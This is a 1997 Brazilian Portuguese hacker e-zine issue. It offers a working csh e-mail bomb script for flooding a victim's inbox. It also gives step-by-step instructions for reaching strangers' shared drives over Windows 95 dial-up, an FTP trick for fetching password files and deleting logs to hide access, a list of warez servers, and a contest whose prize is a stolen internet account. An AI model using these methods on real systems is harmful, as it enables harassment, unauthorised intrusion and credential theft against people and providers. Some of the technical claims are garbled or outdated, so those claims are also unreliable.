 `$$a ,$$$'   `"첩체$$' ,$$체'  $$a,. `$$a ,$$$'  `체$$$' `$$체첩'   "체$$$sS
"첩체$$$$$$'           `,'         `" $$$$$$$'       `$ ,$'         `
    `체$'              $              ` $"           `$'           '   
      ;               ;                !             ;               
      짯               짯               ,$a            짯
     ,$a                              $$$
     $$$             "$"              "$"
     `$'    
 ______    ______      _______        ___              _______
|i     \  |      \    |       )      |   \            (       )
|      |\ |      |\\  |        \\\\\ |   |\\         /    _   i\\\        
|      |\\|      |\\  |         \\\\\|   |\\        /    /\\    \\\
|      ----      |\\  |    |\    \\\\|   |\\       /    /\\_\    \\\
|                |\\  |    | \    \\\|   |\\      /               \\\
|       __       |\\  |    |\ \    \\|   |\\     /      /---\      \\\
|      |\ |      |\\  |    |\\ \    \|   |\\    /      /\\   \      \\\
|      |\ |      |\\  |    |\\\ \        |\\   /      /\\\\\  \      \\\ 
|      |\\|      |\\  |    |\\\\ \       |\\  /       |\\\\\\ |       \\\
|_____i|\\|______|\\  |____)\\\\\\\_____i)\\ (________)\\\\\\\(________)\\   
 \\\\\\\\\\\\\\\\\\\    \\\\\\\\\\\\\\\\\\\\   \\\\\\\\\\\\\\\\\\\\\\\\\\\\
  \\\\\\\\\\\\\\\\\\     \\\\\\\\\\\\\\\\\\\    \\\\\\\\\\\\\\\\\\\\\\\\\\\
					  Ascii Created by -= [HellRe횖짰] =-

@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@
  
                       [HAckEr'짠 Productions 1997]

@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@
=============================================================================
                        HAcKer짠 Productions 짤1997                      
                               Dezembro 97                              
=============================================================================
                         
=============================================================================

H.N.A - revista mensal ( todos dia 01 na BBS mais pr짖xima).
Pagina oficial: http:\\www.hacknatio.com.br - AINDA FORA DO AR
Webmaster - HellRe횖짰 - hellred@rocketmail.com

17:20 30/12/97 - Edicao - Dezembro 97


			
*****************************************************************************
***************************** -.- HAckErs -.- *******************************
********************************** No.04 ************************************
*****************************************************************************    
                                                                  
   !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
     !!   ____	 ______	 _______  ______ 			      !! 
     !!  /    \ /  __  \/  	)/  __  \			      !! 	
     !!  |    |	| (  ) |   __|  || (  ) | $$$$$$$$$$$$$$$$$           !!
     !!  |    | | |  | |   |(___)| |  | | $$$$$$$$$$$$$$$$$	      !!
     !!  |    |_|_(__) |   |     | |  |	| $$$$$$$$$$$$$$$$$	      !!	
     !!  |         \   |   \___-)| (__) |   	  $$$$$$$$$	      !!
     !!  \_________/___/________|\______/          $$$$$$$            !!
     !!            				    $$$$$             !!
     !!  A "H.N.A",				     $$$	      !!
     !!	 estara promovendo um concurso de Logos.      $	              !!
     !!	 Oq s찾o Logos? S찾o akelas figuras de entarda de Home-Page's,  !!
     !!  entaum os amantes de 3DS, 3D Max, 3DStudio, Adobe photo-shop,!!
     !!  Ulead Cool3D, Fractal Desgin.....etc, comecem a fazer o nosso!!
     !!  Logo, 챕 claro que tem que ter o nome nosso n챕 que 챕 ( H.N.A )!!
     !!  Quem quiser dar uma encrementada nele vale tudo.....a Imagem !!
     !!  tem que ser em  ( Gif ou Jpg ),..nada de BMP..heheh ;-)      !!
     !!              						      !! 
     !!  Agora vc's devem estar-se perguntando: Oq eu ganho com isso? !!   
     !!  Muito simples vc ganhara seu NiCk ou Handle se preferirem em !!
     !!  nosso Zine.....Ex:                                           !!
     !!           __________________________________________          !!
     !!          |seu nick,seu nick,seu nick,seu nick, nick |         !!
     !!          |s                                        s|         !! 
     !!          |e                                        e|         !!
     !!          |u                                        u|         !!
     !!          |                                          |         !!
     !!          |n                                        n|         !!
     !!          |i                                        i|         !!
     !!          |c             Nosso E-Zine               c|         !!
     !!          |k                                        k|         !! 
     !!          |,                                        ,|         !!
     !!          |n                                        n|         !! 
     !!          |i                                        i|         !!
     !!          |c                                        c|         !!
     !!          |seu nick,seu nickseu nick,seu nickseu nick|         !!
     !!          |__________________________________________|         !!
     !!                                                               !!
     !!                                                               !!
     !!  E ai entendeu, 챕 isso mesmo o nosso zine fica no meio como   !!        
     !!  vc esta lendo agora, ou seja ele fica nas bordas do zine.    !!                       
     !!  Ele ficara estampado em nos 2 ultimos zine's do mes.....     !!   
     !!  Meu imagina seu nome ( Nick, Handle ) indo num mailist de    !!
     !!  quase 50.000 pessoas...putz...vc ficara mais famoso que o    !!
     !!  nosso zine....eta sorte hein.....entaum aproveite e naum     !!
     !!  demore....fa챌a seu logo agora....e nos envie por e-mail.     !! 
     !!                                                               !!
     !!  Nosso email 챕 hellred@rocketmail.com                         !!  
     !!  							      !!
     !!  Envie agora e boa sorte........                              !!
     !!								      !!
     !!  Ps: Envie seu E-mail junto,....pois se ganhar como recebera  !!    	
     !!  o premio...heheh.......ahhhh.....e tb o premio inclue 2      !!
     !!  op챌천es, 1째 Uma senha de INTERNET hackeada por mim de 60 hrs, !!
     !!  2째 Membro de nossa associa챌찾o!!                              !!
     !!								      !!
     !!  Enatum boa sorte e envie j찼 .....                            !! 
     !!								      !!
     !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!




-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-

INDICE:
=========
     
     1- iNTRODUCAO
     2- COMO MANDAR E-MAIL BOMB
     3- CONECTANDO O DIAL-UP A INTERNET
     4- COMO HACKEAR O DIAL-UP     
     5- HACKEANDO PROVEDORES POR FTP
     6- ALGUNS LiNKS DE HACKiNG 
     7- CARTAS
     8- RULEZ
     9- O QUE VEM DEPOiS      

-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0


1- [iNtRODUCAO]
  

  Agora sim, o e-zine esta saindo na data certa, sem atrasos!
  Todo dia 1 do mes o e-zine estara disponivel no site Chaos100 ou 
  em BBS, tambem existem outros sites na internet que distribuem nosso  
  e-zine. E so procurar um pouco!
    
  Bom finalmente, depois de apelos por e-mail e no e-zine conseguimos
  um Mailing List. Quem quiser mandar mensagens pelo Mailing List e so
  se cadastrar no site e depois mandar as mensagens para o e-mail do
  M.L, anota: chlist@coollist.com!
  O site esta quase terminado, faltam os links apenas. Recemos varios
  e-mails de pessoas dando maior forca pro e-zine, e ate de pessoas
  dos EUA e UK, isso mostra que o e-zine ja esta circulando por la!
  Recebemos um pedido para que a pagina tambem tivesse uma versao em
  ingles, por causa dessas pessoas! Ate que da pra fazer, mas a pagina
  e muito grande e eu nao to afim de traduzir tudo, se alguem quiser 
  se candidatar e so falar!
  Por enquanto e so galera!
  
  
  
                               [HellRed]


-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0


2- [COMO MANDAR E-MAIL BOMB]


  Bom, nao e dificil colocar esse script pra funcionar!
  E so prestar bastante atencao nas linhas que se seguem, isto e, voce
  tera que configurar algumas linhas pras suas necessidades.
  Colocar o server, o e-mail de destino etc...

=======================================================================
Program: E-Mail Bomb Script
Autor: Desconhecido
=======================================================================

================================[cut]==================================

# A Very SLOW and psuedo-anonymous mailbomber. I mailed myself two letters
# and it took about 60 seconds to run, and then 15 minutres for them to 
# show up in my mailbox.  Make your own judgements....


#!/bin/csh
# Anonymous Mailbomber
#do chmod u+rwx <filename> where filename is the name of the file that you saved
# it as.
#*** WARNING - THIS WILL CREATE AND DELETE A TEMP FILE CALLED "teltemp"
# IN THE DIRECTORY IT IS RUN FROM ****

clear
echo -n "What is the name or address of the smtp server ?"
set server = $<
#echo open $server 25 > teltemp
echo quote helo somewhere.com >> teltemp

#The entry for the following should be a single name (goober),
#not goober@internet.address. 
echo -n "Who will this be from (e.g. somebody) ?"
set from = $<
echo quote mail from: $from >> teltemp

echo -n "Who is the lucky recipient (e.g. someone@somewhere) ? "
set name = $<
echo quote rcpt to: $name >> teltemp
echo quote data >> teltemp
echo quote . >> teltemp
echo quote quit >> teltemp
echo quit >> teltemp

echo -n "How many times should it be sent ?"
set amount = $<
set loop_count = 1

while ($loop_count <= $amount)
	echo "Done $loop_count"
	ftp -n $server 25 < teltemp
	@ loop_count++
end

rm ./teltemp
echo $amount e-mails complete to $name from $from@$server


================================[cut]==================================


-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-



3- [CONECTANDO O DIAL-UP A INTERNET]

  
  Realmente esta e a parte mais facil.
  Antes de comecar, serao necessarios os diquestes de instalacao do
  Windows95, e algumas informacoes fornecidas pelo seu provedor de 
  internet, sobre o tipo de conta (PPP/SLIP), IP etc...
  Vamos precisar do nome do usuario(login), senha(password), o telefone
  do seu provedor, o domain name do provedor, o endereco IP do provedor
  e o subnet mask do provedor!

  E mais ou menos isso ai...

=======================================================================
Autor: HellRe횖짰
E-mail: <hellred@rocketmail.com>
HAckErs Productions 1997
Fonte: Internet.br
=======================================================================


COMO FAZER
==========


1) INSTALANDO O ACESSO A REDE DIAL-UP
   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

1- Clique em iniciar, selecione CONFIGURACOES e entao clique em PAINEL
   DE CONTROLE.

2- De um duplo clique no icone ADICIONAR ou REMOVER PROGRAMAS.


3- Selecione INSTALACAO DO WINDOWS.


4- Clique na opcao COMUNICACOES, e entao DETALHES!


5- Verifique se a opcao ACESSO A REDE DIAL-UP esta selecionada, caso
   nao esteja, selecione. 

6- Clique OK em todos os menus ate voltar ao PAINEL DE CONTROLE.


7- O Windows instalara os drivers necessarios para o acesso a rede
   dial-up!



2) INSTALANDO O PROTOCOLO TCP/IP
   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

1- Clique em iniciar, selecione CONFIGURACOES e entao clique em PAINEL
   DE CONTROLE.

2- Duplo clique no icone REDE.


3- Selecione CONFIGURACAO.


4- Nessa altura, a LISTA DE COMPONENTES INSTALADOS apresenta o
   ADAPTADOR DIAL-UP. Se o TCP/IP fizer parte desta lista, siga o passo
   numero 3, caso contrario continue...

5- Clique em ADICIONAR, em Protocolo e novamente em ADICIONAR.


6- Selecione MICROSOFT como fabricante, e entao escolha TCP/IP como
   protocolos de rede.

7- Clique OK em todos os menus ate voltar ao PAINEL DE CONTROLE.


8- O windows instalara os drivers do protocolo TCP/IP.
   Isso fara com que o Windows solicite autorizacao para um reboot,
   voce devera confirmar este reboot!


3) CONFIGURANDO O PROTOCOLO TCP/IP
   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^


1- Clique em iniciar, selecione CONFIGURACOES e entao clique PAINEL DE
   CONTROLE.

2- Duplo clique no icone REDE.


3- Selecione CONFIGURACAO.


4- Observe a existencia do ADAPTADOR DIAL-UP e do protocolo TCP/IP
   instalados nos passos anteriores.

5- Clique no protocolo TCP/IP e entao no botao PROPRIEDADES, sera
   apresentada uma janela com seis secoes.

a) ENDERECO IP - Selecione obter um endereco IP automaticamente.

b) CONFIGURACAO WINS - Selecione a opcao DESATIVAR RESOLUCAO WINS.

c) GATEWAY - Nao informe nada nesta secao, deixe como esta.

d) LIGACOES - Selecione a opcao CLIENTES PARA REDE MICROSOFT.

e) AVANCADO - Nao informe nada nesta secao, deixe como esta.

f) CONFIGURACAO DNS - Essa e a mais trabalhosa...

...Selecione a opcao ATIVAR DNS
  
   HOST - digite o nome do usuario
  
   DOMINIO - digite o nome do seu provedor
  
   ORDEM DE PESQUISA DO SERVIDOR DNS - digite o endereco IP do seu
   provedor de servico e clique o botao ADICIONAR.
   
   ORDEM DE PESQUISA DE SUFIXO - digite novamente o nome do seu prove-
   dor e clique o botao ADICIONAR.

   * Clique OK em todos os menus ate voltar ao PAINEL DE CONTROLE. Isso
     fara com que o Windows solicite novamente o reboot, cofirme o
     reboot!


4) CRIANDO UM ICONE PARA CONEXAO
   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

1- Duplo clique no icone MEU COMPUTADOR, e entao duplo clique no icone
   ACESSO A REDE DIAL-UP.

2- Duplo clique no icone FAZER NOVA CONEXAO. Uma janela solicitando
   informacoes a respeito da conexao ira aparecer.

3- Forneca um nome apropriado para sua conexao, esse nome sera associa-
   do a um icone. 

4- Seu modem devera estar selecionado em SELECIONAR UM MODEM, clique
   no botao CONFIGURAR!

5- Selecione GERAL, configure a velocidade do seu modem para mais rapi-
   do do que voce realmente pensa que ele alcanca.
   Uma boa opcao para modems com 14.4K ou 28.8K b.p.s e selecionar uma
   velocidade de 57600. 
   OBS: Nao selecione CONECTAR SOMENTE NESTA VELOCIDADE!

6- Em CONEXAO - nada precisa ser feito, pois os valores padrao ja estao
   selecionados, bits de dados: 8, paridade: nenhuma, bits de paridade:
   1.

7- Selecione OPCOES, selecione EXIBIR A JANELA DE TERMINAL APOS A DIS-
   CAGEM.
   Este passo e extremamente importante!

8- De volta a janela FAZER NOVA CONEXAO, clique em AVANCAR.


9- Digite o numero do telefone do seu provedor de servico. Se esse
   numero for local, voce nao precisa colocar o codigo de area.

10- Clique o botao AVANCAR, o Windows ira confirmar a criacao do icone.
    Clique CONCLUIR e o seu icone sera criado!    



5) CONFIGURANDO AS PROPRIEDADES DA CONEXAO
   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^


1- Clique no novo icone criado no passo anterior.
   Pressione o botao direito do mouse e escolha PROPRIEDADES. Surgira
   uma janela com o mesmo nome do icone.

2- Caso NAO seja necessario a utilizacao do codigo de pais e cidade,
   clique em USAR CODIGO DE PAIS E CIDADE, inibindo-os.

3- Clique o botao TIPO DO SERVIDOR.


4- Em TIPO DE SERVIDOR DIAL-UP, pressione a seta e escolha a opcao PPP,
   Windows95, Windows NT 3.5, Internet. Observe que essa escolha e 
   feita considerando que a sua conta e do tipo SLIP/PPP. Como o proto-
   colo PPP apresenta vantagens em relacao ao SLIP, sempre que possivel
   e melhor optar por ele.

5- Em OPCOES AVANCADAS, certifique-se de que a opcao EFETUAR LOG ON na
   rede NAO esta selecionada!

6- Em PROTOCOLOS DE REDE PERMITIDOS, selcione TCP/IP. Clique OK e entao
   clique OK novamente!
   E isso ai, se ja ta pronto pra ligar pro seu provedor!!


OBS: Quando voce ligar e conectar ao provedor, espere que todo o login
     apareca, e preencha com seu login e pass, ou entao aperte F7!
 
OBS2: A rede Dial-Up possui varios BUGS! Saiba que usando a rede Dial-
      Up voce corre varios riscos!
      Veja a reportagem abaixo!



-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-
 


4- [COMO HACKEAR A REDE DIAL-UP]

  
  Bom ai vai uma maneira bem simples de hackear a rede Dial-Up!
  A pessoa que usa a rede Dial-Up corre serios riscos!
  Quando voce utiliza a rede Dial-Up do Windows95, voce esta disponi
  bilizando o seu computador a todos os usuarios da Internet.
  Existem varias maneiras de outras pessoas se conectarem ao seu compu-
  tador caso voce esteja utilizando este tipo de conexao!

  Pra que isso funcione o seu provedor tem de fornecer uma conexao PPP!
  Ja que voces pediram, ai esta como hackear a rede Dial-Up.

=======================================================================
Autor: Pururuca
E-mail: desconhecido
Pururuca's Home Page
=======================================================================



COMO FAZER
==========


1- Verifique se o compartilhamento de impressoras e arquivos estam 
   instalados.

2- Se estiverem, isto permitira que outras pessoas conectem no seu
   computador facilmente, basta saber o IP!(facil)
   
3- Para configurar estas opcoes va ao PAINEL DE CONTROLE e depois em
   REDE.

4- Va as propriedades do protocolo TCP/IP ali voce esncontrara a opcao
   para ativar a resolucao WINS.

5- Ponha um servidor WINS, caso nao conheca, utilize 204.118.34.6 como
   primario e 204.118.34.11 como secundario. Eles sao servidores dos
   EUA e sao gratuitos. Caso queira outros enderecos, use algum prove
   dor de busca na Internet.

6- Para configurar o LMHOSTS, voce precisa criar um arquivo texto 
   simples, pode ser o Word Pad do Windows95, ou outro qualquer.

7- O arquivo a ser criado deve ser chamado de LMHOSTS. E nesse arquivo
   que irao ficar LOGados os enderecos IP e os nomes dos computadores
   que voce tera acesso.

8- Para localizar um determinado computador voce digitara o seu numero
   de IP e depois o NetBios, na mesma linha, separados apenas por um
   espaco.

9- Execute o programa NBTSTAT, seguido da opcao -N, voce obtera uma
   lista com o nome e o IP de seu computador sempre sendo o primeiro
   da lista, seguido das outras maquinas disponiveis, tudo numa janela
   de DOS.

10- Va ao Explorer para ver os computadores disponiveis na rede, dos
    quais voce ainda podera utilizar os discos, mapeando-os, o que os
    tornara unidade de seu computador.


=======================================================================


-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-



5- [HACKEANDO PROVEDORES POR FTP]


  Muito facil tambem, voce so precisa de um provedor antigo, para que
  tudo funcione bem...

=======================================================================
Autor: Chameleon 
E-mail: <marc5@earthlink.net>
Chaos100 Productions 1997
=======================================================================

  Texto traduzido por Cyber Mac <cyber_mac@rocketmail.com>


  WINDOWS 95
  ^^^^^^^^^^
  Va ao prompt do DOS apos estabelecer uma conexao atraves da rede 
  dial-up, escreva o destino, um exemplo: windows95.com...e so um
  exemplo, nao vai colocar isso porque nao tem nada haver.


  DIGITE
  ^^^^^^
  1- ftp windows95.com
  
  2-o servidor vai perguntar o seu username, pressione enter
  
  3-o servidor vai perguntar pelo password, pressione enter
  
  4-e no prompt escreva: 
  
  quote user ftp
  ^^^^^^^^^^^^^^
  e depois..
  
  quote cwd ~root
  ^^^^^^^^^^^^^^^
  e depois..
 
  quote pass ftp
  ^^^^^^^^^^^^^^


  Faca isto para deletar o arquivo de log, com ele o adiministrador do
  sistema sabera quem acessou e vera voce. Mas se voce o deletar 
  ninguem sabera que voce acessou.
  O diretorio /etc/passwd nao sera possivel, entao...

  1-Digite cd etc e digite get password 
  
  Se voce tiver feito tudo isso corretamente e se o servidor tiver 
  um simples e antigo sistema de seguranca tudo ocorrera bem.
  Voce vai ter um root access.  
  Para quem nao sabe root acess e o maior status de seguranca que voce
  pode ter.
  
  OBS: Isso so vai trabalhar em servidores antigos
  como os que as universidades usam.

  UNIX
  ^^^^
  Faca tudo no prompt do unix.

  LINUX 
  ^^^^^
  Faca tudo no unix.

  OS/2
  ^^^^ 
  Faca tudo no windows 95, mas abra uma janela OS/2 windows.


=======================================================================
  Texto traduzido por Cyber Mac <cyber_mac@rocketmail.com>
=======================================================================
  Edicao: HellRe횖짰
  E-mail: <hellred@rocketmail.com>
  HAckErs Productions 1997
=======================================================================


-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-



6- [ALGUNS LINKS DE HACKING]

Nota - *-Ruim **-Bom ***-Muito Bom
Ratio - Quantos arquivos voce tem que mandar pra poder pegar.
EX: 1:6 - Manda 1 e pega 6.
Login - Pode ser anonimo ou nao. Se houver sera publicado com o login.
   

1- ftp.zkiller.dynip.com 
 
-Warez
-Login: anonimo
-Ratio: 1:5 
-Nota: **

2- 207.107.160.53

-Warez
-Login: anonimo
-Ratio: 1:6
-Nota: **
  
3- 207.221.67.102

-Warez
-Login: anonimo
-Ratio: ---
-Nota: **

4- 194.235.215.238

-Warez
-Login: anonimo
-Ratio: ---
-Nota: **

5- 208.131.158.144

-Warez
-Login: anonimo
-Ratio: ---
-Nota: **


-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-


7- [CARTAS]

  Ai estam algumas das mensagens enviadas para nos nesse periodo!
  As mensagens mais importantes, de ajuda, opniao etc serao publica
  das...mande ja a sua!

=======================================================================
 
            /--/    /--/        /--\        /--/          /--\
           /  /    /  /        /    \      /  /          /    \
          /  /    /  /        /  /\ \     /  /          /  /\  \
         /   ----/  /        /  / \  \   /  /          /   --   \
        /  /----/  /        /  /  \  \   /  /         /  /----\  \
       /  /    /  /  /--/  /  /    \ \  /  /  /--/   /  /      \  \
      /--/    /--/  /--\  /--/     \--\/--/  /--\   /--/        \--\

                             -=[e-MaiL]=-
 
\............../\/|:::::::::::[dIvISioN]:::::::::::|\/\............../
 



Subject: Fwd: .-~~- H.N.A .-~~-
   Date: Mon, 15 Sep 1997 16:14:58 -0700 (PDT)
   From: Thunder_t
  Email: <---------------------->  
     To: hellred@rocketmail.com 
        

>  Voces sao otimos artistas graficos, ja fiz dw dos seus e-zines vou
>  ler-los e por-los em minha hp, obrigado por me avisar do e-zine, 
>  e boa sorte para voces rente ao e-zine voces estao de parabens.

---> Hehe, valeu cara, estamos fazendo o melhor possivel!
     []SuZ

 
============================={Message No2}=============================

Subject: Sugestao de assunto para o zine
   Date: Mon, 15 Sep 1997 16:40:57 -0700 (PDT)
   From: thunder_t
  Email: <----------------------> 
     To: hellred@rocketmail.com



>  Oi, queria sugerir a voces que posussem algumas wordlists na hp e
>  escrevessem sobre as principais falhas da rede dial-up e ambiente de
>  rede no w95, espero nao ter abusado na sugestao.

--> A mensagem veio meio confusa mas deu pra entender...falou sugestao
    anota e ja atendida...A reportagem sobre as falhas da rede Dial-Up
    ja foram publicadas!
    []SuZ

============================{Message No3}==============================   

  Subject: Parabens....!!! :)
     Date: Wed, 17 Sep 1997 11:48:35 +0000
     From: "Paulo M. Luiz (Muito Cool)"
 Reply-To: <----------------------->
    Email: <----------------------->
       To: hellred@rocketmail.com



>  HellReD,

>  Em rela챌찾o ao que a sua PAGE esta muito 10, continue assim!!!

>  --
>  []'s

>  Paulo Luiz


-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-


8- [RULEZ]


  Falou por enquanto e so...
  Estamos precisando de Editor pro E-zine, quem quiser se candidatar
  manda um e-mail pra mim <hellred@rocketmail.com> ok?
  Esse segunda mes do e-zine foi muito bom, recebi varios e-mails
  dando uma ajuda, dando opnioes, valeu, continuem mandando logico!
  
  Comecamos este mes a publicar as mensagens do pessoal que acessa o
  site e acompanha o e-zine!

  Colocamos tambem um Mailing List, entao porra, vamo colocar la o
  e-mail de voces pra gente poder ter uma correio legal de mensagens,
  qualquer assunto, relacionado a Hacking logico...vamo participar..
  Mesmo que voce nao acesse Internet, pede pra um amigo seu colocar
  seu e-mail, assim voce recebe mensagens do Mailing List pelo seu
  BBS sei la...
  O GuestBook ta legal, mas eu queria ter uma ideia das pessoas que
  acessam o site, entam...da um SIGN e coisa rapida!
  Ahh tem tambem o Message Board, vamos colocar mensagens la po!;)


9- [O QUE VEM DEPOIS?]

  
  No proximo mes:
===================

1- Phreaking
2- Outro PPE Backdoor
3- Windows95 Hack 
4- Outra maneira de mandar e-mail bomb
5- Mais links de warez
6- Cartas
7- Mailing List - Mensagens postadas no Mailing List
8- Message Board - Mensagens postadas no Message Board


Obs: Possiveis titulos, nao quer dizer que vai ser isso mesmo ok?
     Pode aparecer algo mais interessante!


  

-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-
 

|Editores|

HellRed짰



=======================================================================
                       Hackers Productions 1997                      
                                                            
=======================================================================
                             Dezembro 97
=======================================================================
                 
=======================================================================
